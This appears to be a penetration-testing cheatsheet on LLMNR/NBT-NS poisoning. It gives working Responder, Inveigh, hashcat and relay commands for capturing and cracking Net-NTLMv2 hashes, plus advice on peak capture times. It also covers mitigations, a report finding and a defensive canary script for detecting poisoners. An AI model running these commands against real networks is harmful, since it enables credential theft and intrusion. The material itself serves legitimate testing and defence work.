Methodology Checklist
- Start Responder: `sudo responder -I [IFACE] -wdv`
- Wait for LLMNR/NBT-NS requests (triggered by mistyped shares, failed DNS)
- Collect NTLMv2 hashes from Responder logs
- Crack hashes: `hashcat -m 5600 hashes.txt [wordlist]`
- Alternatively: relay with ntlmrelayx (requires targets with SMB signing disabled)
- Windows alternative: run Inveigh from a compromised Windows host
- Verify cracked credentials before escalation
Operational Context
Use when: On the internal network with no initial creds → poison LLMNR/NBT-NS to capture Net-NTLMv2 hashes from any host that broadcasts a name resolution request.
Think Dumber First: `python Responder.py -I [IFACE] -w -d` → just run it and wait. Hashes come in passively as users access network resources. Peak times: morning login (8-9am) and after lunch (1-2pm) when people reconnect mapped drives.
Skip when: LLMNR/NBT-NS is disabled via GPO → confirm first with `nmap --script llmnr [SUBNET]`; if no response, poisoning won't work.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `sudo responder -I [IFACE] -A` | Analyze mode: passive listen, no poisoning |
| `sudo responder -I [IFACE] -w -r -f` | Active poisoning: capture NetNTLMv2 hashes |
| `hashcat -m 5600 captured_hash.txt rockyou.txt` | Crack NetNTLMv2 hash (mode 5600) |
| `cat /usr/share/responder/logs/SMB-NTLMv2-SSP-[IP].txt` | View captured hashes from Responder logs |
| `Import-Module .\Inveigh.ps1` | Load Inveigh (Windows equivalent of Responder) |
| `Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y` | Start Inveigh poisoning (PowerShell) |
| `.\Inveigh.exe` | Start InveighZero (C# version) |
| `GET NTLMV2UNIQUE` | Inveigh console: show unique captured hashes |
| `GET NTLMV2USERNAMES` | Inveigh console: show captured usernames + source IPs |
Deep Dive & Workflow
How LLMNR/NBT-NS Poisoning Works
Windows falls back to broadcast protocols when DNS fails:
- LLMNR → UDP 5355, link-local multicast
- NBT-NS → UDP 137, NetBIOS
The attack:
- Victim mistypes a share name (`\\printer01` instead of `\\print01`)
- DNS fails → victim broadcasts "Who knows `\\printer01`?" via LLMNR/NBT-NS
- Responder (attacker) replies "That's me"
- Victim sends NetNTLMv2 hash to authenticate
- Attacker captures hash for offline cracking or relay
Critical: NetNTLMv2 hashes cannot be used for Pass-the-Hash directly; they must be cracked or relayed.
Responder (Linux) Workflow
```bash
# Phase 1: Analyze traffic first (safe, no disruption)
sudo responder -I eth0 -A
# Phase 2: Active poisoning
sudo responder -I eth0 -w -r -f
# -w: WPAD rogue proxy (effective when browsers auto-detect proxy settings)
# -r: Answer NetBIOS wredir suffix queries
# -f: Fingerprint remote host OS/version
# Phase 3: Crack
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt /usr/share/wordlists/rockyou.txt
```
Logs are stored in /usr/share/responder/logs/; file name format: MODULE-HASHTYPE-CLIENT_IP.txt
Port conflict check: Responder needs ports 80, 445, 53. Ensure nothing else is bound to them.
Inveigh (Windows)
Use when operating from a compromised Windows host or a client-provided Windows attack VM:
```powershell
# PowerShell version
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
# C# version (more stable)
.\Inveigh.exe
# Interactive console commands (press ESC to enter/exit)
GET NTLMV2UNIQUE      # all unique hashes
GET NTLMV2USERNAMES   # usernames + source IPs
GET CLEARTEXTUNIQUE   # cleartext credentials (HTTP Basic Auth)
```
Requires local admin to bind privileged ports (445, 80, 137).
Detection & Mitigation (for Reporting)
- Disable LLMNR: Group Policy → Computer Configuration → Admin Templates → Network → DNS Client → Turn OFF Multicast Name Resolution
- Disable NBT-NS: NIC → IPv4 Properties → Advanced → WINS → Disable NetBIOS over TCP/IP
- Monitor: UDP 5355, UDP 137 traffic; Event IDs 4697, 7045
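As an added detection example (not part of the original cheatsheet or of the Responder/Inveigh projects), a defender-side LLMNR canary in Python: it asks the 224.0.0.252:5355 multicast group for a name that no host legitimately owns, so any reply is by definition a poisoner, and the answering host's source address is what you alert on. The packet layout follows RFC 4795 (LLMNR reuses the DNS wire format); the sample reply bytes at the bottom are constructed for the offline test, and the random `canary-` name and 2 s timeout are assumptions.

```python
import os
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group and UDP port
def build_llmnr_query(name, txid):  # LLMNR reuses the DNS wire format
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0 (query), QDCOUNT=1
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
def _skip_name(data, off):  # step past a label sequence or a 2-byte compression pointer
    while data[off] and data[off] & 0xC0 != 0xC0:
        off += 1 + data[off]
    return off + (2 if data[off] else 1)

def parse_llmnr_answers(data, txid):  # A-record IPs in a reply to txid; [] for anything else
    try:
        rid, flags, qd, an = struct.unpack("!HHHH", data[:8])
        if rid != txid or not flags & 0x8000 or an == 0:  # wrong ID, QR bit clear, or no answers
            return []
        off = 12
        for _ in range(qd):
            off = _skip_name(data, off) + 4  # question: name + QTYPE + QCLASS
        ips = []
        for _ in range(an):
            off = _skip_name(data, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])  # type, class, ttl, rdlength
            off += 10
            if rtype == 1 and rdlen == 4:
                ips.append(socket.inet_ntoa(data[off:off + 4]))
            off += rdlen
        return ips
    except (struct.error, IndexError):  # truncated or garbage packet
        return []

def probe_for_poisoner(timeout=2.0):  # canary: nobody owns the name, so every answer is a poisoner
    name, txid = "canary-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    hits = []  # (responder_ip, ip_it_claims_for_the_name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
            while True:  # keep reading until the timeout; several hosts may answer
                data, (src, _) = sock.recvfrom(512)
                hits.extend((src, ip) for ip in parse_llmnr_answers(data, txid))
        except (socket.timeout, OSError):  # timeout = clean network; OSError = no route/offline
            pass
    return hits

# Constructed sample: a poisoner's reply to txid 0x1234 (QR=1, our question echoed, one A answer = 10.0.0.5)
SAMPLE_RESPONSE = (b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00" + build_llmnr_query("canary-test", 0x1234)[12:]
                   + b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\x0a\x00\x00\x05")
```

Run `probe_for_poisoner()` from a scheduled job on each VLAN; a non-empty result is a high-confidence alert, since a healthy network never answers a name nobody registered.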
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Responder captures nothing | LLMNR/NBT-NS disabled by GPO | Check: nmap -sU -p 5355 [SUBNET] for LLMNR; if no response, pivot to other initial access |
| Hashes captured but NTLMv1 only | Older Windows version | NTLMv1 hashes crack differently; use mode 5500 for NTLMv1 in hashcat |
| Responder conflicts with local services | Port 80/443/53 already in use | Stop local services or use --lm --ntml --wpad to select only needed protocols |
| Hash captured but relay fails | SMB signing enabled on target | Check: nxc smb [TARGET] --gen-relay-list relay_targets.txt for unsigned hosts |
| Responder .db file not found | Wrong path | Hashes stored in /usr/share/responder/logs/; also printed to stdout in real time |
Reporting Trigger
Finding Title: LLMNR/NBT-NS Poisoning Captures Net-NTLMv2 Hashes
Impact: LLMNR/NBT-NS poisoning passively captures authentication hashes from any network user who attempts to access a non-existent or mistyped network resource, providing Net-NTLMv2 hashes for offline cracking or direct relay without any active exploitation.
Root Cause: LLMNR and NBT-NS enabled by default on Windows systems, allowing any network observer to respond to broadcast name resolution queries and capture the resulting authentication.
Recommendation: Disable LLMNR via GPO (Computer Configuration > Admin Templates > Network > DNS Client > Turn off multicast name resolution). Disable NBT-NS (Network Adapter > TCP/IP > WINS > Disable NetBIOS). Enable SMB signing to prevent relay attacks.